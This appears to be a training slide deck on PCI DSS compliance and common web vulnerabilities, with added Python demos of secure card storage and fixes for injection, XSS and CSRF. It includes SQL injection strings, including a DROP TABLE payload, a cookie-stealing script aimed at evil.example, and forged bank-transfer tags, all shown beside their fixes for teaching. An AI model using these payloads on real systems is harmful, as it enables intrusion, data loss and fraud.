PCI DSS and Security overview.
Good information about PCI (definition, history, need, compliance, ...).
Some famous security vulnerabilities with clear examples.



  • Why do we need to secure our online software, e.g. an e-shopping cart? All of us have heard about the risks, hackers and security breaches that brought down many companies in the last 20 years and caused a lot of damage to many merchants and businesses: stealing credit card information from customers, fraudulent credit card operations.
  • With data security compromises on the rise it is more important than ever to take measures to safeguard our customers and business. Hackers can pose a risk to our business both on-site and remotely, making it necessary to implement procedures to protect sensitive data. The largest breach in history at the time: 94 million card numbers stolen, disclosed in 2007, at TJX Companies (parent of the TJ Maxx clothing chain). 70% of all database breaches are internal. Here in CME we had to learn and apply the PCI requirements in the Subway project; all of us know that Subway sells food, drinks etc., so the system must process and transfer payments between customers and Subway restaurants. For the last couple of months we focused on applying the DSS requirements, and we passed the PCI assessments.
  • Companies like Visa, MasterCard and others started implementing procedures and solutions to stop attackers and safeguard merchants. But before 2004 each brand had its own security program (Visa's CISP, MasterCard's SDP, and so on), which left merchants confused about which one to work with.
  • In 2004 the Payment Card Industry Data Security Standard (PCI DSS) was created by the major card brands: Visa, MasterCard, Discover, American Express and JCB. They merged their separate programs into one standard, PCI DSS, and in 2006 formed the PCI Security Standards Council (PCI SSC), which maintains it, publishes revisions and issues additional security standards. PCI DSS requirements apply to all members, merchants and service providers that store, process or transmit cardholder data.
  • Who are the players in the flow? Visa and MasterCard are associations made up of member organisations that can be acquirers, issuers or both. Acquirers are the members of the Visa or MasterCard associations that sign up and handle merchants. Issuers are the members that issue cards to cardholders. Merchants are the entities that accept card transactions. Cardholders are consumers like us. Service providers are the entities that provide any service requiring the processing, storage or transport of card information on behalf of any of the above.
  • What may be stored (columns: storage permitted / protection required):
    Cardholder data:
      Primary Account Number (PAN): yes / yes (must be rendered unreadable wherever it is stored)
      Cardholder Name: yes / yes (when stored together with the PAN)
      Service Code: yes / yes (when stored together with the PAN)
      Expiration Date: yes / yes (when stored together with the PAN)
    Sensitive authentication data (never stored after authorization, even encrypted):
      Full magnetic stripe data (or chip equivalent): no / N/A
      CVV2/CVC2/CID: no / N/A
      PIN / PIN block: no / N/A
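The following is an added example, not code from the original deck: it applies the storage rules in the table above before a card record is written. The PAN is kept only in masked and keyed-hash form, the other cardholder-data fields are stored alongside it, and any sensitive authentication data (SAD) causes the record to be rejected. The field names, the Luhn check and the demo hashing key are assumptions made for this example.

```python
"""Added example (not from the original deck): enforcing the cardholder-data
storage rules before persisting a card record.  Field names and the demo key
are assumptions for this example."""
import hashlib
import hmac

# Sensitive authentication data: never persisted after authorization.
SAD_FIELDS = ("track_data", "cvv2", "pin", "pin_block")

# Constructed demo secret.  A real system keeps the hashing key in an HSM or
# key-management service (PCI DSS key-management requirements), never in source.
DEMO_HASH_KEY = b"example-only-key"


def luhn_valid(pan: str) -> bool:
    """Luhn check digit; rejects mistyped PANs before they reach storage."""
    if not pan.isdigit() or not 13 <= len(pan) <= 19:
        return False
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:              # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Display form: at most the first six and last four digits."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def pan_token(pan: str) -> str:
    """Keyed one-way hash for lookups (one accepted way to render a PAN unreadable)."""
    return hmac.new(DEMO_HASH_KEY, pan.encode(), hashlib.sha256).hexdigest()


def storage_violations(card: dict) -> list:
    """Names of SAD fields present in the record; must be empty to store."""
    return [f for f in SAD_FIELDS if card.get(f)]


def prepare_for_storage(card: dict) -> dict:
    """Return the record that may be persisted, or raise if it must not be."""
    bad = storage_violations(card)
    if bad:
        raise ValueError(f"refusing to store sensitive authentication data: {bad}")
    pan = card["pan"].replace(" ", "")
    if not luhn_valid(pan):
        raise ValueError("PAN fails Luhn check")
    return {
        "pan_masked": mask_pan(pan),    # what staff and receipts may see
        "pan_token": pan_token(pan),    # what the database keeps for matching
        "name": card.get("name"),       # protected because stored with the PAN
        "expiry": card.get("expiry"),
        "service_code": card.get("service_code"),
    }


if __name__ == "__main__":
    # Constructed input: the standard Visa test PAN, no SAD present.
    print(prepare_for_storage({"pan": "4111 1111 1111 1111",
                               "name": "J. Doe", "expiry": "12/26"}))
```

The same record with a `cvv2` field raises before anything is hashed, which is the behaviour to test for: once SAD is on disk, even briefly, the entity is out of compliance regardless of encryption.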
  • By classification: service providers have stronger validation requirements than merchants. By size: entities that process larger volumes have stronger validation requirements (an on-site assessment by a Qualified Security Assessor and a Report on Compliance) than those that process smaller volumes (a Self-Assessment Questionnaire).
  • The 12 PCI DSS requirements, grouped under the six control objectives:
    Build and maintain a secure network: 1. Install and maintain a firewall configuration to protect cardholder data. 2. Do not use vendor-supplied defaults for system passwords and other security parameters.
    Protect cardholder data: 3. Protect stored cardholder data. 4. Encrypt transmission of cardholder data across open, public networks.
    Maintain a vulnerability management program: 5. Use and regularly update antivirus software. 6. Develop and maintain secure systems and applications.
    Implement strong access control measures: 7. Restrict access to cardholder data by business need-to-know. 8. Assign a unique ID to each person with computer access. 9. Restrict physical access to cardholder data.
    Regularly monitor and test networks: 10. Track and monitor all access to network resources and cardholder data. 11. Regularly test security systems and processes.
    Maintain an information security policy: 12. Maintain a policy that addresses information security for all personnel.
  • This is the highly recommended design (three tiers): Presentation layer (web): web servers are publicly accessible and generate content for customers; no sensitive data storage. Processing layer (application): should never be publicly accessible; its role is to process, format and prepare data for storage or transmission. Data-storage layer: should never be publicly accessible, since it may store sensitive information (payment card data, ...). Each tier sits in its own network segment with a firewall between tiers, so a compromised web server cannot talk to the database directly.
  • Vulnerabilities caused by Insecure Coding Practices

Presentation Transcript

  • PCI-DSS and Security Overview
  • Agenda  Introduction  Security in Software Industry  Top 10 Vulnerabilities  Examples  Threats & Risks  PCI DSS  Security Breaches examples and solutions  Q&A
  • Introduction  Security is hard to achieve  Security is relevant to every product  Assess the risk, so you can define your security level  The industry is now more aware of the risk  End-users are more affected by breaches: phones, tablets, notebooks, social networks
  • Security in the Software Industry  Security means:  Availability: the public and/or private information is always there when needed  Confidentiality: the private information is well protected and not exposed  Authentication: the user's identity is always verified  Managing risk, not just avoiding vulnerabilities  In case of a breach:  Reduce the loss  Identify the compromised data  Identify the source of the breach
  • Security in the Software Industry Cont'd  HTTPS, HSTS, certificates, etc.  Stronger identification of the user:  Mobile phone (one-time codes)  CAPTCHA  Personal questions  Physical tokens  Code scanning for security flaws  Security scanning tools  Joint efforts between development and deployment teams: engineers have to bake security into the product
  • Top 10 Vulnerabilities  OWASP stands for Open Web Application Security Project https://www.owasp.org  Based on OWASP’s 2013 report, the Top 10 vulnerabilities are:  Injection  Broken Authentication and Session Management  Cross-Site Scripting (XSS)  Insecure Direct Object References  Security Misconfiguration  Sensitive Data Exposure  Missing Function Level Access Control  Cross-Site Request Forgery (CSRF)  Using Components with Known Vulnerabilities  Unvalidated Redirects and Forwards
  • Worst Security Breaches  Heartland Payment Systems  Date: March 2008  Impact: 134 million credit cards exposed; attackers used SQL injection to install spyware on Heartland's data systems.  TJX Companies Inc.  Date: December 2006  Impact: 94 million credit cards exposed.  Sony's PlayStation Network  Date: April 20, 2011  Impact: 77 million PlayStation Network accounts hacked; Sony is said to have lost millions while the service was down for about a month. Full list here: http://www.csoonline.com/article/700263/the-15-worst-data-security-breaches-of-the-21st-century
  • Risks in Payment Industry
  • The gaps  Weak configurations  OS flaws  Programming errors  Backdoors  Network
  • Risks in Payment Industry  Credit card theft:  Phishing attempts on the rise: tricking individuals into divulging financial information  Many chat channels devoted to underground trading of credit card numbers
  • Before 2004
  • Credit Card Industry Players
  • Credit Card information
  • What is PCI  PCI DSS defines what a compliant payment environment looks like; being compliant helps you avoid costly security breaches.  Defines the framework of a secure payment environment.  PCI compliance is universally required; validation requirements vary:  By classification  By size
  • PCI Requirements  The six control objectives:  Build and maintain a secure network  Protect cardholder data  Maintain a vulnerability management program  Implement strong access control measures  Regularly monitor and test networks  Maintain an information security policy
  • PCI Requirements  We can split the requirements into 3 major parts: 1. Network infrastructure 2. Software security 3. Regularly monitor and maintain the network
  • Network Infrastructure  Three-tier e-commerce computing infrastructure
  • Software Security  PCI DSS must be applied to software/code for:  POS  Mobile apps  Web applications  Common PCI mistakes:  Storing card data in plain text  Poorly coded websites (XSS, CSRF, injection)  Lack of monitoring and logging  Logging payment data (PAN or CVV2 in application logs)  Not using SSL/TLS (at least for the payment page; PCI DSS requires it wherever cardholder data crosses a public network)
  • Monitor and Maintain Network  Manage security controls including firewalls, digital certificates and SSL/TLS encryption  Regularly change server/network passwords (and remove vendor defaults)  Scheduled backups (DB and application)  Performance monitoring  Restrict access to servers/database
  • What are the costs of a security breach?  Banned from accepting credit cards  Loss of reputation and customers  Fines up to $500,000 per incident  Replacement cards for breached accounts ($20-$30 per account)
  • Vulnerabilities  Injection Flaws  Cross-site Scripting (XSS)  Cross-site Request Forgery (CSRF)  Buffer Overflows  Weak Authentication and Session Credentials  Brute force and Dictionary attacks  And more…
  • Injection flaws  In addition to SQL injection, this includes OS command and LDAP injection. These flaws occur when data input to a website is not properly validated by the application code and is concatenated into a command or query, so attacker-supplied data is executed as part of the command, which may result in unauthorized access.  i.e.: Dim query As String = "select [fields] from [table] where Email = '" & email & "';"
  • Injection flaws  A normal query: SELECT fields FROM tableName WHERE Email = 'test@gmail.com';  Let's log in, no account needed (email = anything' OR 'x'='x): SELECT fieldlist FROM table WHERE field = 'anything' OR 'x'='x';  What about guessing some table names (email = x'; DROP TABLE members; --): SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; DROP TABLE members; --';  And lots more...
  • SQL Injection Sol.  Validate user input: length, type and syntax.  Ensure that the database account the application uses has the least privileges (no DROP TABLE from the web tier).  Use strongly typed parameterized query APIs (prepared statements).  Use stored procedures instead of plain-text queries, but only if the procedure itself does not build dynamic SQL from its arguments.
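As an added example (not the deck's own code), the login-bypass injection from the slide above run against a constructed SQLite table, next to the parameterized query that stops it and the input-validation layer the solution slide asks for. The table, its rows and the column names are assumptions made for this example.

```python
"""Added example (not from the original deck): concatenated vs. parameterized
login query.  Table, rows and column names are assumptions for this example."""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory members table.  Passwords are plain text only to
    keep the demo short; a real table stores salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (email TEXT, passwd TEXT, login_id TEXT, full_name TEXT)")
    conn.executemany(
        "INSERT INTO members VALUES (?, ?, ?, ?)",
        [("test@gmail.com", "s3cret", "test", "Test User"),
         ("admin@example.com", "hunter2", "admin", "Site Admin")],
    )
    return conn


def login_vulnerable(conn, email: str, password: str):
    """String concatenation, the same shape as the deck's Dim query example."""
    query = ("SELECT login_id FROM members WHERE email = '" + email
             + "' AND passwd = '" + password + "';")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, email: str, password: str):
    """Parameterized query: values travel separately from the SQL text, so a
    quote in the input can never change the statement's structure."""
    row = conn.execute(
        "SELECT login_id FROM members WHERE email = ? AND passwd = ?",
        (email, password),
    ).fetchone()
    return row[0] if row else None


EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def valid_email(value: str) -> bool:
    """Input validation (length, type, syntax): a second layer, not a
    substitute for parameterization."""
    return len(value) <= 254 and EMAIL_RE.match(value) is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 'x'='x"      # makes the WHERE clause ... passwd = '' OR 'x'='x'
    print("vulnerable login:", login_vulnerable(db, "x", payload))
    print("safe login:      ", login_safe(db, "x", payload))
```

The vulnerable function returns a valid login_id for an email that does not exist, while the parameterized one returns nothing. The stacked `DROP TABLE members` payload from the slide is not reproduced here because Python's sqlite3 `execute()` refuses more than one statement per call; database drivers that accept batched statements (classic ADO against SQL Server, for instance) run it, which is why the least-privilege point on the solution slide matters.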
  • Cross-site Scripting (XSS)  The result of poor application-level input validation and output encoding.  XSS allows an attacker to run script in the victim's browser, which can hijack the browser session (steal cookies) and redirect the victim to a malicious website.  i.e.: the ErrorMessage parameter is reflected into the page unencoded: Response.Redirect("Login.asp?ErrorMessage=Invalid"+username+"or"+password")
  • Cross-site Scripting (XSS)  (three screenshots) The form  The attacker changes the URL  The form will be
  • XSS sol.  Possible sources of malicious data:  QueryString  Cookies  Posted data  XSS solutions:  Encode output: HTML-encode data at the point where it is written into the page, on the server (client-side encoding alone is bypassed by sending the request directly)  Validate and filter input parameters for special characters
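The reflected XSS in the ErrorMessage parameter above, reproduced as an added example (not the deck's own code) with a tiny page renderer, beside the output-encoded version and a rebuilt redirect that keeps the password out of the URL. The page layout, the `evil.example` host and the parameter handling are assumptions made for this example.

```python
"""Added example (not from the original deck): reflected XSS through the
ErrorMessage query parameter and its output-encoded fix.  Page layout and
the attacker host are assumptions for this example."""
import html
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed payload: ships the victim's cookies to an attacker-controlled host.
PAYLOAD = "<script>document.location='http://evil.example/?c='+document.cookie</script>"


def attack_url() -> str:
    """The URL the attacker sends to the victim (constructed for the demo)."""
    return "Login.asp?" + urlencode({"ErrorMessage": PAYLOAD})


def error_message(url: str) -> str:
    """Pull ErrorMessage out of the query string (one of the malicious-data
    sources listed above, alongside cookies and posted data)."""
    qs = parse_qs(urlparse(url).query)
    return qs.get("ErrorMessage", [""])[0]


def render_vulnerable(url: str) -> str:
    """Reflects the parameter straight into HTML: the browser runs the script."""
    return "<p class='error'>" + error_message(url) + "</p>"


def render_safe(url: str) -> str:
    """HTML-encode at output time: the same bytes now display as text."""
    return "<p class='error'>" + html.escape(error_message(url), quote=True) + "</p>"


def build_redirect_safe(username: str) -> str:
    """Rebuild the deck's Response.Redirect target: URL-encode the parameter
    and never place the password in the URL (it would land in server logs
    and Referer headers)."""
    return "Login.asp?" + urlencode({"ErrorMessage": "Invalid login for " + username})


if __name__ == "__main__":
    print(render_vulnerable(attack_url()))
    print(render_safe(attack_url()))
    print(build_redirect_safe("bob"))
```

URL-encoding the redirect (as `build_redirect_safe` does) fixes the malformed URL and the password leak, but on its own it does not fix the XSS: the server decodes the parameter before rendering, so the HTML encoding in `render_safe` is the control that actually stops the script.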
  • Cross-site Request Forgery (CSRF)  Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, like change the victim's e-mail address, home address, or password, or purchase something. CSRF attacks generally target functions that cause a state change on the server but can also be used to access sensitive data.
  • Cross-site Request Forgery (CSRF)  i.e.:  The legitimate request: POST http://bank.com/transfer.do HTTP/1.1 ... Content-Length: 19  acct=BOB&amount=100  What if this is also possible: GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1  The easiest way: <a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>  Or, with no click needed: <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">
  • CSRF Sol.  The solution is:  Anti-forgery tokens  Unique, unguessable token per session  Stored in the user's session on the server  POSTed from the UI in a hidden field and compared against the session copy on every state-changing request  POST data only; disable GET for state changes
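The anti-forgery token flow described above, applied to the bank.com/transfer.do request from the earlier slide, as an added example (not the deck's own code). The session store, the request shape and the handler are assumptions made for this example; the three forged requests mirror the GET image tag, an auto-submitted cross-site form, and a guessed token.

```python
"""Added example (not from the original deck): anti-forgery token check for a
state-changing transfer request.  Session store, request shape and handler
are assumptions for this example."""
import hmac
import secrets


def issue_token(session: dict) -> str:
    """Create a unique, unguessable token and keep it in the user's session;
    the UI embeds it in a hidden form field on the transfer page."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def handle_transfer(session: dict, request: dict) -> dict:
    """transfer.do: a state change, so POST only, and the posted token must
    match the session copy (constant-time comparison)."""
    if request["method"] != "POST":
        return {"status": 405, "error": "state-changing request must be POST"}
    expected = session.get("csrf_token", "")
    supplied = request.get("form", {}).get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return {"status": 403, "error": "missing or invalid anti-forgery token"}
    form = request["form"]
    amount = int(form["amount"])
    session["balance"] -= amount
    return {"status": 200, "to": form["acct"], "amount": amount}


def demo() -> dict:
    """Constructed scenarios: one legitimate transfer and three forgeries."""
    session = {"user": "alice", "balance": 1000}
    token = issue_token(session)
    results = {
        # Alice's own form, carrying the token the server issued to her.
        "legit": handle_transfer(session, {"method": "POST",
            "form": {"acct": "BOB", "amount": "100", "csrf_token": token}}),
        # The <img src=...> trick: the browser fires a GET with Alice's cookies.
        "img_get": handle_transfer(session, {"method": "GET",
            "form": {"acct": "MARIA", "amount": "100000"}}),
        # A hidden auto-submitting form on the attacker's page: POST, no token.
        "post_no_token": handle_transfer(session, {"method": "POST",
            "form": {"acct": "MARIA", "amount": "100000"}}),
        # The attacker cannot read Alice's session, so any token is a guess.
        "post_guessed": handle_transfer(session, {"method": "POST",
            "form": {"acct": "MARIA", "amount": "100000", "csrf_token": "guess"}}),
    }
    results["balance"] = session["balance"]
    return results


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Only the legitimate request changes the balance. The token must be compared on the server against the session copy, as here; a check that only looks at whether the field is present, or that trusts a value echoed back from a cookie without the session binding, can be satisfied by the attacker.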
  • Q&A